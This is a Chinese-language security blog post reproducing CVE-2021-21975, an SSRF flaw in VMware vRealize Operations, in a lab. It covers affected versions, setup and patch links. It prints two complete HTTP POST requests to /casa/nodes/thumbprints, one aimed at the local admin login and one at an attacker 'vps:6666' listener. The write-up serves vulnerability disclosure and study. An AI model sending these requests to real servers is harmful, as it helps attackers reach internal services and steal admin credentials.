CVE-2021-21975​:VMware vRealize SSRF复现

2021-05-07 6,650


上方蓝色字体关注我们,一起学安全!
作者:Pet3r@Timeline Sec
本文字数:1027
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负


0x01 简介


vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率。


0x02 漏洞概述


编号:CVE-2021-21975

此漏洞是vRealize Operations API管理器中的服务器端请求伪造(SSRF)漏洞,该漏洞可能允许未经身份验证的远程攻击者窃取管理密码。VMware将漏洞指定为“重要”严重等级,CVSSv3评分为8.6。


0x03 影响版本


VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0

VMware Cloud Foundation 4.x、3.x

vRealize Suite Lifecycle Manager 8.x


0x04 环境搭建


漏洞环境下载地址:

https://my.vmware.com/zh/group/vmware/patch#search




访问生成的地址:

https://192.168.3.6



0x05 漏洞复现


验证1:服务端请求登录


POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["127.0.0.1:443/admin/login.action"]

验证2:vps监听


POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.3.6Connection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsBContent-Type: application/json;charset=UTF-8Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 36
["vps:6666"]





0x06 修复方式



建议参考官方公告及时升级或安装相应补丁

下载链接:

https://kb.vmware.com/s/article/83210

参考链接:

https://www.vmware.com/security/advisories/VMSA-2021-0004.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975

https://www.bleepingcomputer.com/news/security/vmware-fixes-bug-allowing-attackers-to-steal-admin-credentials/


本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/158561.html

Tags:
评论  (0)
快来写下你的想法吧!

Timeline Sec

文章数:23 积分: 190

欢迎关注公众号Timeline Sec

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号